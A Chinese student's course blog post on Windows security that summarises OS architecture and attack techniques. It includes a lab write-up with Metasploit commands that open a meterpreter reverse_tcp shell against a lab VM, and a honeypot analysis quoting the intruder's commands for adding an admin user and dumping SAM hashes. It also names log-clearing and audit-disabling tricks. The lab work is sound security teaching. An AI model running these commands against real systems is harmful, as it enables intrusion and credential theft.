20199328 2019-2020-2 《网络攻防实践》第7周作业

20199328 2019-2020-2 《网络攻防实践》第7周作业

1.实践内容

Windows 操作系统基本框架概述

Windows操作系统的基本结构

Windows操作系统内核的基本模块:

  • Windows执行体: 即Windows内核核心文件ntoskrnl.exe的上层接口, 包含基本的操作系统内核服务
  • Windows内核体: 即Windows内核核心文件moskrnl.exe中酌数实现与硬件体系结 构支持代码, 实现底层的操作系统功能
  • 设备驱动程序: 包括将用户I/O操作映射为特定硬件设备I/O请求的硬件设备驱动程序, 以及文件系统与网络设备驱动程序
  • 硬件抽象层: 即hal.dll文件, 是用于屏蔽Windows 内核与平台硬件差异性的底层代码。
  • Windows窗口与图形界面接口内核实现代码: 即win32k.sys文件

Windows橾作系统布用户态的代码模块:

  • 系统支持进程: Windows开机自动启动的系统内建服务进程
  • 环境子系统服务进程: 为操作系统运行环境提供支待的服务进程
  • 服务进程:通过Windows的服务管理机制所启动的一 系列系统及网络服务
  • 用户应用软件: 在用户态执行的各类用户应用软件
  • 核心子系统DLL:即kemel32.dll/user32.dll/gdi32.dll/advapi32.dll等动态连接库文件

Windows操作系统内核中实现了如下的核心机制:

  • Windows内存管理机制:Windows的虚拟内存空间分为系统核心内存区间与用户内存区间两部分
  • Windows文件管理机制:NTFS文件系统从ACL访问控制列表来保证文件资源读/写的安全性,较FAT更加安全,此外具有更高的性能、可靠性和磁盘利用效率
  • Windows注册表管理机制:Windows系统注册表在作为系统全局配置、 用户和应用软件配置信息的存储仓库,在 Windows系统配置和控制方面承担着关键角色
  • Windows的网络机制:①各种网卡硬件的设备驱动程序,一般由第三方硬件厂商开发并提供,处于OSl参考模型的物理层。②NDIS (Network Driver Interface Specification)库及miniport驱动程序,位千OSI链路层,为各种不同的网卡适配器驱动程序和TDI传输层之间构建了一个封装接口③TDI,传输层,将网络请求格式化成IRP,以及申请网络地址和数据通信④网络API DLL及TDI客户端,会话层和表示层,独立于具体协议提供网络交互和实现方式⑤I接口的具体实现, 通过向TDI传输层网络协议驱动发送IRP请求, 来完成API具体请求的网络通信操作。

Windows操作系统的安全体系结构与机制

  • Windows安全体系结构:Windows操作系统基千引用监控器模型(Reference Monitor)来实现基本的对象安全模型
  • Windows身份认证机制:Windows操作系统中以安全主体概念来包含所有进行系统资源访问诸求的实体对象;Windows为每个用户和计算机设置账户(accounts)进行管理;Windows 用户账户的口令字经过加密处理之后被保存于SAM或者活动目录AD中;对于试图使用Windows系统的用户与远程计算机等安全主体,Windows通过一些秘密信息来认证安全主体真实合法的身份, 进行用户身份认证;Winlogon进程、GINA图形化登录窗口与LSASS服务通过协作来完成本地身份认证过程

Windows授权与访问控制机制:

  • Windows的授权与访问控制机制是基千引用监控器模型, 由内核中的 SRM模块与用 户态的LSASS服务共同来实施, 由SRM作为安全主体访间对象资源时的中介, 根据设定的访问控制列表进行授权访问;Windows对于系统中所有需保护的资源都抽象成对象,个SD安全描述符(Security Descriptor), 每个对象会关联一个对象安令描述符,由如下主要属性组成:
    • Owner SID:对象所有者的SID安全标识符。
    • Group SID: 对象所在基本用户组的SID安全标识符(兼容POSJX使用)。
    • DACL自主访问控制列表:指明了哪些安全中体可以何种方式来访间该对象
    • SACL系统审计访问控制列表:指明了由哪些中体发起的哪些访问操作需要被审计。

Windows安全审计机制:

  • 统审计策略在本地安全策略中由系 统管理员定义,来确定系统对哪些事件进行记录

Windows 的其他安全机制:

  • 其中 一项比较重要的安全机制是由Windows XP SP2开始引入的Windows安全中心

Windows远程安全攻防技术:

  • 攻击Windows网络服务:windows存在着可导致远程代码执行的高危性安全漏洞, 攻击者也一直在利用这些漏洞来对Windows网络服务实施远程渗透攻击, 从而得到Windows系统 的访问权。
  • 远程口令猜测与破解攻击: 远程渗透攻击Windows 系统最简单的方法仍然是猜测 或破解出系统的登录口令
  • 攻击 Windows客户端及用户:针对Web浏览器、 第三方应用软件的客户端渗透攻击变得非常流行,此外,攻击者还会结合社会工程学技巧诱骗终端用户来帮助他们执行伪装目的的恶意代码或流氓软件

Windows 系统的安全漏洞生命周期:

  • 针对特定目标的渗透测试攻击过程:涌洞扫描测试->查找针对发现漏洞的渗透代码->实施渗透测试

Windows本地特权提升:在攻击者获得Windows系统上的受限用户权限之后,他们将立即若眼千获得终极特权: Administrator或LocalSystem账户。
Windows敏感信息窃取:

  • Windows系统口令字密文提取技术:①从另一操作系统启动后拷贝文件系统中的口令密文文件②利用硬盘修复工具包中的 rdisk工具, 执行“ rdisk /s-"命令创建SAM备份文件副本③使用pwdumpX系列工具直接从SAM文件或活动目录中提取口令字密文
  • Windows系统口令字破解技术:在获得口令字密文文件之后, 下一步就是实施密文破解, 从中破译出用户口令
  • 用户敏感数据窃取:对于用户在系统中的文件, 攻击者可以执行find、findstr、grep等命令行工贝来实施查找, 一些功能强大的后门软件,攻击者也可能使川键击记录器(keylogger)来对用户键盘输入进行监听
  • 本地敏感信息窃取防范措施:Administrator特权用户, 选择一个好的口令字

Windows消踪灭迹:

  • 关闭审计功能:攻击者用 auditpol 程序的 “ disable" 参数关闭 台 Windows 系统的审计功能。
  • 清理事件日志:攻击者会对事件日志中留下的蛛丝乃迹进行清理,攻击者获得 Administrator 权限之后, 就可以通过远程桌而控制目标系统
  • 针对消踪灭迹的防范措施:需要防御者在事先配置好系统审计与网络服务审计功能
  • Windows 远程控制与后门程序:攻击者往往会在受控的系统中自主植入第三方的远桯控制与后门程序, 主要分为命令行远程控制工具、 图形化远程控制工具这两大类。

2.实践过程

实验一:动手实践Metasploit windows attacker

  • 任务:使用metasploit软件进行windows远程渗透统计实验
  • 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
  • 首先在这里我们使用ms03_026作为我们攻击的目标漏洞,通过use exploit/windows/dcerpc/ms03_026_dcom使用相关攻击脚本
  • 接下来设置攻击的载荷,载荷的相关含义我们在上文提到过。通过命令set PAYLOAD windows/meterpreter/reverse_tcp设置打开反向连接的载荷
  • 设置受害靶机,通过命令set RHOST 192.168.91.132
  • 设置攻击主机,通过命令set LHOST 192.168.91.129
  • 接下来通过exploit发起攻击
  • 得到meterpreter返回之后表示攻击成功
  • 开启的靶机的shell
  • 验证攻击是否成功
  • 创建文件
  • 靶机查看文件
  • 查看权限(发现是系统权限)




实验二:解码一次成功的NT系统破解攻击

来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

  • 攻击者使用了什么破解工具进行攻击
  • 攻击者如何使用这个破解工具进入并控制了系统
  • 攻击者获得系统访问权限后做了什么
  • 我们如何防止这样的攻击
  • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

用wireshark打开那个.log文件发现有很多http报文,使用wireshark自带的统计工具。点击统计->http->请求。发现有两个地方进行了大量的操作,可疑的文件有两个,一个是cmd1.exe,另外一个是boot.ini(这个是NT系统的启动文件),简单对boot.ini进行了追踪,发现攻击者好像是在帮被攻击者找漏洞,也可能是恶作剧,但是后面又发现他试图查看这台主机的各种文件以及对话,还对各种文件进行了增删改查,查看开启的服务,查看创建用户等在进行追踪时发现了一下数据,这里我以为他没有发现这是个蜜罐,有图为证。



以下为追踪boot.ini结果:可见其大致操作过程

dir
dir
.[Adir
dir
del ftpcom
ls.
dir
type readme.e
c:.
cd\
dir
rm ..
del fun
dir
cd exploites
dir
cd exploits
dir
cd microsoft
dir
cd ..
cd newfiles
dir
cd ..
cd unix
dir
cd ..
dir
cd ..
dir
dir
dir'
dir
cat yay
type yay.
type yay.txt
net session
net users
dir
type yay2.txt
del yay2.txt
net session >>yay3.txt
dir
del yay&.*
dir
del yay*
del yay3.txt
dir
dir
yuper .....
type heh.txt
del heh.txt
cd program files
dir
cd ..
dir
echo Hi, i know that this a ..is a lab server, but patch the holes! :-) >>README.NOW.Hax0r
dir
dir
net group
net localgroup
net group domain admins
.[Anet group /?
net group ??
net group /?
net group 
net localgroup
net localgroup /domain admins
net localgroup domain admins
net users
net session
.[A.[A.[Anet localgroup domain admins
net group domain admins
net localgroup administrators
.[Anet localgroup administrators
net localgroup administrators
net session
dir
cd program files
dir
cd common files
dir
cd obdc
dir
cd microsoft shadr..red
cd microsoft shared
dir
cd ..
cd odbc
dir
cd data dou
cd data sources
dir
cd..
cd ..
dir
cd system
dir
cd msads
dir
cd msas.dcs
cd msadc
dir
psu
pdump
net start
net localgroup administrators
dir..
net users
net users
net users /?
net users hi guy /ADD
/net..
netnet password
net user
net user /?
net user himan HarHar666 /ADD
net name
net user
net user Administrator
cd /winnt
dir
cd \winnt
cd C:\Program Files\Common Files\System\msadc
del c
del samdump.dll
del pdump.exe
del 
cd\winnt
cd resp..
cd repair
dir
rdisk -s/
d.rd
rdisk -/s
dir
rdisk
rdisk -s
dir
cat 
type sam._
dir
dir
dir
dir
dir
dir
dir
c:
dir
cd\
dir
type har.txt
......dir
......dir
......cd wiretrip
......exit...
......exit
......

在继续检查一下,发现他在寻求服务器的msadcs.dll文件,Windows的动态链接库文件,经常在系统盘里看到,应该很重要,于是进行筛选,看出他进行了sql语句进行了查询,大致获得了一个可供进一步访问的相关数据,接着发现了pdump.exe,结果发现它不能在dos上用。。。费了很大的劲,发现他最后看了har.txt感觉这是个决定性的线索,于是进行各种过滤筛选,发现他看出来这是个蜜罐,这种漏洞的话,就是及时打补丁,及时升级各种插件防火墙什么的。


实践三

攻方使用metaploit选择漏洞进行攻击,获得控制权。

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

攻击过程同实践一,可见攻击从ARP开始,由192.168.91.130 1046端口到192.168.91.132 135端口,MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的。所以据这么多SMB数据包可以推断出,是利用这个漏洞攻击的


3.学习中遇到的问题及解决

  • 问题1:实验二不知如何下手
  • 问题1解决方案:看看别人的博客大致了解下思路

4.实践总结

感觉实验二有点难。。。

posted @ 2020-04-13 04:15  刘琳杰20199328  阅读(293)  评论(0编辑  收藏  举报
返回顶部